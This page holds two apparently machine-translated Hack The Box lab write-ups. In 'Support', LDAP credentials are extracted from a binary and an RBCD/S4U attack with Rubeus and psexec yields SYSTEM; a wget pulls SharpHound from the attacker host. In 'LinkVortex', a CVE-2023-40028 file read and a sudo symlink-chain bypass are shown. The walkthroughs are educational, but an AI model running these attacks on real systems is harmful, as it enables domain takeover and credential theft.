Posts Tagged hackthebox

Hack The Box – Support Writeup

Hack The Box
app.hackthebox.com

This is the Writeup of HackTheBox “Support”.

User Flag

Perform a port scan.

$ nmap -Pn -sCV -A -T4 -p- -oN nmap_result 10.10.11.174
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-09 13:31:34Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49674/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49686/tcp open  msrpc         Microsoft Windows RPC
49699/tcp open  msrpc         Microsoft Windows RPC
49741/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-09T13:32:36
|_  start_date: N/A
|_clock-skew: 1s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

You now know the operational status of the port.

Now that I know the domain name, I will add it./etc/hosts

10.10.11.174    support.htb

I checked the DNS and found the subdomain, so I will add it to ./etc/hosts

$ dig @10.10.11.174 support.htb any

;; ANSWER SECTION:
support.htb.            600     IN      A       10.10.11.174
support.htb.            3600    IN      NS      dc.support.htb.
support.htb.            3600    IN      SOA     dc.support.htb. hostmaster.support.htb. 107 900 600 86400 3600

Start with SMB enumeration.

I’ve found that enumerating share names.support-tools

$ smbclient -N -L 10.10.11.174

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        support-tools   Disk      support staff tools
        SYSVOL          Disk      Logon server share

support-toolsWhen you go to the store, you will find multiple exe and zip files.

$ smbclient -N //10.10.11.174/support-tools
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Jul 20 13:01:06 2022
  ..                                  D        0  Sat May 28 07:18:25 2022
  7-ZipPortable_21.07.paf.exe         A  2880728  Sat May 28 07:19:19 2022
  npp.8.4.1.portable.x64.zip          A  5439245  Sat May 28 07:19:55 2022
  putty.exe                           A  1273576  Sat May 28 07:20:06 2022
  SysinternalsSuite.zip               A 48102161  Sat May 28 07:19:31 2022
  UserInfo.exe.zip                    A   277499  Wed Jul 20 13:01:07 2022
  windirstat1_1_2_setup.exe           A    79171  Sat May 28 07:20:17 2022
  WiresharkPortable64_3.6.5.paf.exe      A 44398000  Sat May 28 07:19:43 2022

UserInfo.exe.zipis suspicious, so I will download it.

smb: \> get UserInfo.exe.zip 
getting file \UserInfo.exe.zip of size 277499 as UserInfo.exe.zip (48.3 KiloBytes/sec) (average 48.3 KiloBytes/sec)

When I unzipped it, I got an executable file called.UserInfo.exe

$ ls -la
total 944
drwxrwxr-x 2 kali kali   4096 Apr 12 11:44 .
drwxrwxr-x 3 kali kali   4096 Apr 12 11:43 ..
-rw-rw-rw- 1 kali kali  99840 Mar  1  2022 CommandLineParser.dll
-rw-rw-rw- 1 kali kali  22144 Oct 22  2021 Microsoft.Bcl.AsyncInterfaces.dll
-rw-rw-rw- 1 kali kali  47216 Oct 22  2021 Microsoft.Extensions.DependencyInjection.Abstractions.dll
-rw-rw-rw- 1 kali kali  84608 Oct 22  2021 Microsoft.Extensions.DependencyInjection.dll
-rw-rw-rw- 1 kali kali  64112 Oct 22  2021 Microsoft.Extensions.Logging.Abstractions.dll
-rw-rw-rw- 1 kali kali  20856 Feb 19  2020 System.Buffers.dll
-rw-rw-rw- 1 kali kali 141184 Feb 19  2020 System.Memory.dll
-rw-rw-rw- 1 kali kali 115856 May 15  2018 System.Numerics.Vectors.dll
-rw-rw-rw- 1 kali kali  18024 Oct 22  2021 System.Runtime.CompilerServices.Unsafe.dll
-rw-rw-rw- 1 kali kali  25984 Feb 19  2020 System.Threading.Tasks.Extensions.dll
-rwxrwxrwx 1 kali kali  12288 May 27  2022 UserInfo.exe
-rw-rw-rw- 1 kali kali    563 May 27  2022 UserInfo.exe.config

UserInfo.exeseems to be an executable file written in..NET

$ file UserInfo.exe        
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows, 3 sections

dnSpyParse with:

https://qiita.com/embed-contents/link-card#qiita-embed-content__20a7a33d8441e0a13b3659ce3faf96c3

UserInfo.ServicesI saw that it was connected to LDAP after execution.LdapQuerygetPassword()DirectoryEntry

image.png

getPassword()Let’s decrypt it.enc_password

image.png

Since LDAP communication is done in plain text, let’s capture the LDAP login process with Wireshark.

First, examine the commands in the executable file.
It seems that the argument of , is required.finduser

$ mono UserInfo.exe

Usage: UserInfo.exe [options] [commands]

Options: 
  -v|--verbose        Verbose output                                    

Commands: 
  find                Find a user                                       
  user                Get information about a user

Looks like we need more options.-username

$ mono UserInfo.exe user
Unable to parse command 'user' reason: Required option '-username' not found!

Execution succeeded.

$ mono UserInfo.exe user -username hello -v
[*] Getting data for hello
[-] Exception: No Such Object

When I checked wireshark, I was able to capture LDAP authentication packets.

image.png

bindRequestWhen I checked the packet data, I was able to confirm a string that seemed to be a password.
Since it is in the following packet, it seems that authentication is successful with this string.bindResponse success

image.png

ldapsearchLDAP enumeration in .

$ ldapsearch -x -H ldap://support.htb -D 'support\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b 'DC=support, DC=htb' > ldapsearch_result

When I checked the results, I found a password-like string in the item.info

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
cn: support

(省略)

info: Ironside47pleasure40Watchful

5985Since the number port is open, the connection with WinRM was successful.

$ evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i support.htb

*Evil-WinRM* PS C:\Users\support\Documents> whoami
support\support

Desktop/user.txtI was able to get the user flag from.

*Evil-WinRM* PS C:\Users\support\Documents> more ..\Desktop\user.txt
2b46946973813a3227dc277318e6809d

Root Flag

Enumerate the AD environment in .
To do so, we will install it on the target machine and execute it.BloodHoundsharphound.exe

*Evil-WinRM* PS C:\Users\support\Documents> wget http://10.10.14.136/SharpHound.exe -o sharphound.exe
*Evil-WinRM* PS C:\Users\support\Documents> .\sharphound.exe

Download the created zip file and load it into BloodHound.

image.png

support@support.htbI found out that there is one > of my account.outbound object controlGroup Delegated Object Control

image.png

support@support.htbis a member of, and the group has authority over .shared support accounts@support.htbDC.support.htbGenericAll

image.png

GenericAllRight-click on the->-> to see how the permissions are abused.HelpWindows Abuse

image.png

This time, it seems that RBCD attacks can be used for privilege escalation.

ms-DS-MachineAccountQuotaYou can add up to 10 computers.10

*Evil-WinRM* PS C:\Users\support\Documents> Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota


DistinguishedName         : DC=support,DC=htb
ms-DS-MachineAccountQuota : 10
Name                      : support
ObjectClass               : domainDNS
ObjectGUID                : 553cd9a3-86c4-4d64-9e85-5146a98c868e

PowerViewVerify that you have not already configured RBCD in .

*Evil-WinRM* PS C:\Users\support\Documents> . ./PowerView.ps1
*Evil-WinRM* PS C:\Users\support\Documents> Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity

name msds-allowedtoactonbehalfofotheridentity
---- ----------------------------------------
DC

PowermadCreate a fake machine to use in the attack and add it to the domain.

*Evil-WinRM* PS C:\Users\support\Documents> . ./Powermad.ps1
*Evil-WinRM* PS C:\Users\support\Documents> New-MachineAccount -MachineAccount FAKE-COMP03 -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account FAKE-COMP03 added

FAKE-COMP03I was able to add the .

*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -identity FAKE-COMP03


DistinguishedName : CN=FAKE-COMP03,CN=Computers,DC=support,DC=htb
DNSHostName       : FAKE-COMP03.support.htb
Enabled           : True
Name              : FAKE-COMP03
ObjectClass       : computer
ObjectGUID        : 75b3431a-c6ea-4069-8133-ba04103a153f
SamAccountName    : FAKE-COMP03$
SID               : S-1-5-21-1677581083-3380853377-188903654-5604
UserPrincipalName :

Add to the RDBS settings.
You can now pose as a domain administrator and issue Kerberos tickets.FAKE-COMP03FAKE-COMP03

*Evil-WinRM* PS C:\Users\support\Documents> Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE-COMP03$
*Evil-WinRM* PS C:\Users\support\Documents> Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount


DistinguishedName                    : CN=DC,OU=Domain Controllers,DC=support,DC=htb
DNSHostName                          : dc.support.htb
Enabled                              : True
Name                                 : DC
ObjectClass                          : computer
ObjectGUID                           : afa13f1c-0399-4f7e-863f-e9c3b94c4127
PrincipalsAllowedToDelegateToAccount : {CN=FAKE-COMP03,CN=Computers,DC=support,DC=htb}
SamAccountName                       : DC$
SID                                  : S-1-5-21-1677581083-3380853377-188903654-1000
UserPrincipalName                    :

S4U攻撃Run the
We will issue a ticket at .Rubeus

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe hash /password:Password123 /user:FAKE-COMP03$ /domain:support.htb

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2


[*] Action: Calculate Password Hash(es)

[*] Input password             : Password123
[*] Input username             : FAKE-COMP03$
[*] Input domain               : support.htb
[*] Salt                       : SUPPORT.HTBhostfake-comp03.support.htb
[*]       rc4_hmac             : 58A478135A93AC3BF058A5EA0E8FDB71
[*]       aes128_cts_hmac_sha1 : 72D3D2472C10AB93EDDB8BB87C51E4A2
[*]       aes256_cts_hmac_sha1 : 560AF12B8DBBDA755C43F4492CBD19FEE8A4CAD073F94C344C7807D0BE8153B6
[*]       des_cbc_md5          : B6DFEA517A5EA7B6

The resulting hash value is used to generate a Kerberos ticket for the administrator.rc4_hmac

*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe s4u /user:FAKE-COMP03$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2

[*] Action: S4U

[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
[*] Building AS-REQ (w/ preauth) for: 'support.htb\FAKE-COMP03$'
[*] Using domain controller: ::1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIFhDCCBYCgAwIBBaEDAgEWooIEmDCCBJRhggSQMIIEjKADAgEFoQ0bC1NVUFBPUlQuSFRCoiAwHqAD

(中略)


[*] Action: S4U

[*] Building S4U2self request for: 'FAKE-COMP03$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'FAKE-COMP03$@SUPPORT.HTB'
[*] base64(ticket.kirbi):

    doIFrDCCBaigAwIBBaEDAgEWooIExjCCBMJhggS+MIIEuqADAgEFoQ0bC1NVUFBPUlQuSFRCohkwF6AD

(中略)

[*] Impersonating user 'Administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':

      doIGaDCCBmSgAwIBBaEDAgEWooIFejCCBXZhggVyMIIFbqADAgEFoQ0bC1NVUFBPUlQuSFRCoiEwH6AD

(中略)

[+] Ticket successfully imported!

Copy the value of the last ticket, format it on the following site, and save it as .ticket.kirbi.b64

https://qiita.com/embed-contents/link-card#qiita-embed-content__434b105a298f3a94c31f853170fb5c36

Decode the saved file and save it as .base64ticket.kirbi

$ base64 -d ticket.kirbi.b64 > ticket.kirbi

Finally, convert the ticket to a format that can be used by .impacket

$ impacket-ticketConverter ticket.kirbi ticket.ccache
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] converting kirbi to ccache...
[+] done

Use the ticket to make a shell connection.
I was able to get the shell of the system account.psexec

$ KRB5CCNAME=ticket.ccache impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file mYVFUPYN.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service Tztr on dc.support.htb.....
[*] Starting service Tztr.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Users\Administrator\Desktop\root.txtI was able to get the root flag from.

C:\Windows\system32> more C:\Users\Administrator\Desktop\root.txt
ba27ef32c706d15469541c11c323dd49

Hack The Box – LinkVortex Writeup

Hack The Box
app.hackthebox.com

User Flag

Perform a port scan.

$ nmap -Pn -sVC -T4 -A -p- 10.10.11.47 -oN nmap_result
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:f8:b9:68:c8:eb:57:0f:cb:0b:47:b9:86:50:83:eb (ECDSA)
|_  256 a2:ea:6e:e1:b6:d7:e7:c5:86:69:ce:ba:05:9e:38:13 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Did not follow redirect to http://linkvortex.htb/
|_http-server-header: Apache

You now know the operational status of the port.

portserviceversion
22sshOpenSSH 8.9p1
80httpApache

Now that you know the domain, add it./etc/hosts

10.10.11.47     linkvortex.htb

80Access the number port.

image.png

It turns out that it was created with an open source tool called From Footer.ghost

image.png
https://qiita.com/embed-contents/link-card#qiita-embed-content__2de0ea4d41fb804a90fabb80324d4d8a
https://qiita.com/embed-contents/link-card#qiita-embed-content__dd8a221289ed41ba274f2da4f33fd08f

ディレクトリスキャンをします。

$ dirsearch -u http://linkvortex.htb/ -x 404

[07:34:11] 301 -  179B  - /assets  ->  /assets/
[07:34:34] 200 -   15KB - /favicon.ico
[07:34:47] 200 -    1KB - /LICENSE
[07:35:11] 200 -  103B  - /robots.txt
[07:35:18] 200 -  256B  - /sitemap.xml

/robots.txtにアクセスすると更なるパスを発見できました。

/robots.txt

User-agent: *
Sitemap: http://linkvortex.htb/sitemap.xml
Disallow: /ghost/
Disallow: /p/
Disallow: /email/
Disallow: /r/

/ghostWhen I accessed the site, a login form was displayed.

image.png

admin@linkvortex.htbWhen I tried to authenticate with , I was able to confirm the existence of this account from the error message.

image.png

Enumerate subdomains.

$ ffuf -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.linkvortex.htb" -u http://linkvortex.htb -fs 230

dev                     [Status: 200, Size: 2538, Words: 670, Lines: 116, Duration: 258ms]

dev.linkvortex.htbI found it in the postscript and access it./etc/hosts

image.png

devサブドメインのディレクトリスキャンをします。

$ dirsearch -u http://dev.linkvortex.htb -x 404

[09:30:23] 301 -  239B  - /.git  ->  http://dev.linkvortex.htb/.git/        
[09:30:23] 200 -  557B  - /.git/
[09:30:23] 200 -  201B  - /.git/config
[09:30:23] 200 -   73B  - /.git/description
[09:30:23] 200 -  620B  - /.git/hooks/
[09:30:23] 200 -   41B  - /.git/HEAD
[09:30:23] 200 -  402B  - /.git/info/

(省略)

/.git/が見つかったので配下をダウンロードします。

$ wget -r http://dev.linkvortex.htb/.git/

コミット履歴を複数確認できました。

$ git log --oneline
299cdb4 (HEAD, tag: v5.58.0) v5.58.0
dce2e68 Added Tips&Donations link to portal links (#17580)
3562560 Data generator: Ensure order of newsletters is correct

(省略)

git diffコマンドでステージング環境との差分を確認するとパスワードを発見できました。

$ git diff --staged

(省略)
 
         it('complete setup', async function () {
             const email = 'test@example.com';
-            const password = 'thisissupersafe';
+            const password = 'OctopiFociPilfer45';

得られたパスワードでログインに成功しました。

image.png

settingsからバージョンがだと分かりました。5.58.0

image.png

When searching for vulnerability information in the affected version, it was found.
It seems that arbitrary files can be read by exploiting this vulnerability.CVE-2023-40028

https://qiita.com/embed-contents/link-card#qiita-embed-content__4d0b5dba068352cd7084396c7c29bcb7

The following repositories were used for the PoC.

https://qiita.com/embed-contents/link-card#qiita-embed-content__5bc981af1256b572c7a2ebd68156d428

/etc/passwdThe file was successfully loaded.

$ ./CVE-2023-40028.sh -u "admin@linkvortex.htb" -p "OctopiFociPilfer45"
file> /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
node:x:1000:1000::/home/node:/bin/bash

If you check the hostname, you can expect to be in a Docker container.

file> /etc/hostname
7facf5f862ae

I would like to view the configuration file, but I don’t know the current directory structure.
Let’s actually build the container locally to understand the directory structure in the container.

Download the official image from Docker Hub.

https://qiita.com/embed-contents/link-card#qiita-embed-content__2d9aff0f5e4b1ef783adc9d32c4fec40

Follow the official announcement to run the command and build.

$ sudo docker pull ghost

$ sudo docker run -d --name some-ghost -e NODE_ENV=development ghost

When you enter the container, you can see that you are in./var/lib/ghost

$ sudo docker exec -it some-ghost /bin/bash
root@85551094b4c0:/var/lib/ghost#

I checked the directory and found it.
You can also get information on the actual target machine by referring to it.config.production.json/var/lib/ghost/config.production.json

# ls -la
total 40
drwxr-xr-x  1 node node 4096 Dec 10 01:30 .
drwxr-xr-x  1 root root 4096 Dec 10 01:29 ..
-rw-r--r--  1 node node   84 Dec 10 01:30 .ghost-cli
lrwxrwxrwx  1 node node   22 Dec 10 01:30 config.development.json -> config.production.json
-rw-r--r--  1 node node  295 Dec 10 01:30 config.production.json
drwxrwxrwt 11 node node 4096 Dec 10 17:26 content
drwxr-xr-x 11 node node 4096 Dec 10 01:29 content.orig
lrwxrwxrwx  1 node node   31 Dec 10 01:30 current -> /var/lib/ghost/versions/5.104.1
drwxr-xr-x  1 node node 4096 Dec 10 01:29 versions

When I actually checked it on the target machine, I was able to get the SMTP credentials.config.production.json

file> /var/lib/ghost/config.production.json
{
  "url": "http://localhost:2368",
  "server": {
    "port": 2368,
    "host": "::"
  },
  "mail": {
    "transport": "Direct"
  },
  "logging": {
    "transports": ["stdout"]
  },
  "process": "systemd",
  "paths": {
    "contentPath": "/var/lib/ghost/content"
  },
  "spam": {
    "user_login": {
        "minWait": 1,
        "maxWait": 604800000,
        "freeRetries": 5000
    }
  },
  "mail": {
     "transport": "SMTP",
     "options": {
      "service": "Google",
      "host": "linkvortex.htb",
      "port": 587,
      "auth": {
        "user": "bob@linkvortex.htb",
        "pass": "fibber-talented-worth"
        }
      }
    }
}

The SSH connection was successful with the obtained credentials.

$ ssh bob@linkvortex.htb
bob@linkvortex:~$

/home/bob/user.txtI was able to get the user flag from.

$ cat user.txt 
f45a09ebd41243969ef945b549ec7a5f

Root Flag

sudo -lIf you check it, it seems that you can do it./opt/ghost/clean_symlink.sh

$ sudo -l
Matching Defaults entries for bob on linkvortex:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty, env_keep+=CHECK_CONTENT

User bob may run the following commands on linkvortex:
    (ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png

/opt/ghost/clean_symlink.shConfirm the processing of the .

/opt/ghost/clean_symlink.sh

#!/bin/bash

QUAR_DIR="/var/quarantined"

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

CHECK_CONTENTIf the environment variable is not set, set it to false.

if [ -z $CHECK_CONTENT ];then
  CHECK_CONTENT=false
fi

It accepts the arguments of the script and checks to see if the file ends with ..png

LINK=$1

if ! [[ "$LINK" =~ \.png$ ]]; then
  /usr/bin/echo "! First argument must be a png file !"
  exit 2
fi

If the PNG file in the argument is a link, get the file name and check if the link destination contains .etcroot

If so, delete the link.

If it is not included, move the file to , and if is true, display the linked file with the cat command./var/quarantinedCHECK_CONTENT

if /usr/bin/sudo /usr/bin/test -L $LINK;then
  LINK_NAME=$(/usr/bin/basename $LINK)
  LINK_TARGET=$(/usr/bin/readlink $LINK)
  if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
    /usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
    /usr/bin/unlink $LINK
  else
    /usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
    /usr/bin/mv $LINK $QUAR_DIR/
    if $CHECK_CONTENT;then
      /usr/bin/echo "Content:"
      /usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
    fi
  fi
fi

It seems that it can be read with the last cat command.
First, satisfy the conditional branch when is true./root/root.txtCHECK_CONTENT

$ CHECK_CONTENT=true
$ export CHECK_CONTENT
$ printenv | grep CHECK_CONTENT
CHECK_CONTENT=true

Next, create a symbolic link.
In this case, we will use to avoid the string check.シンボリックリンクチェーンetcroot

https://qiita.com/embed-contents/link-card#qiita-embed-content__dec550a17d2eb56707c92b2773dcbaab

/root/root.txtCreate a link to the
And create a link to .a.pnga.pngb.png/var/quarantined

$ ln -s /root/root.txt a.png
$ ln -s /var/quarantined/a.png b.png
$ ls -la
total 8
drwxr-xr-x  2 bob  bob  4096 Dec 10 19:17 .
drwxr-xr-x 14 root root 4096 Nov 29 15:58 ..
lrwxrwxrwx  1 bob  bob    14 Dec 10 19:17 a.png -> /root/root.txt
lrwxrwxrwx  1 bob  bob    22 Dec 10 19:17 b.png -> /var/quarantined/a.png

/opt/ghost/clean_symlink.shI was able to get the flag by executing it with the argument of.b.png/root/root.txt

$ sudo /usr/bin/bash /opt/ghost/clean_symlink.sh /var/quarantined/b.png 
Link found [ /var/quarantined/b.png ] , moving it to quarantine
/usr/bin/mv: '/var/quarantined/b.png' and '/var/quarantined/b.png' are the same file
Content:
6a8d12b830755445dc3634720f45860c